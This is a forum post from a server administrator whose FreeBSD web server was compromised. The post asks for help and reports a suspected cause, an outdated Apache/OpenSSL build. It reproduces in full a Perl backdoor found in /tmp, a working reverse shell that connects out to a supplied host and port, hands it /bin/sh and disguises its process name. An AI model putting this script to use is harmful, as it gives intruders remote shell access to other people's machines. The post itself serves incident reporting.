I have server and all my server is hucked sites and root
I reset the pass of admin & root
I find this script in /tmp called "back" which was a script to open up a backdoor to grant someone root access.
This is the scripts contents:
I've deleted the script.
The script was chowned to apache:wheel, meaning a hole in apache was the way he got in.
someone tell me that i need security hardening services
he say this:
what I need to do help me
thank you
I reset the pass of admin & root
I find this script in /tmp called "back" which was a script to open up a backdoor to grant someone root access.
This is the scripts contents:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
I've deleted the script.
The script was chowned to apache:wheel, meaning a hole in apache was the way he got in.
someone tell me that i need security hardening services
he say this:
Based on the fact your system is freebsd 4.10, and that apache is compiled with OpenSSL/0.9.7d .. which is quite old, that's probably why.
what I need to do help me
thank you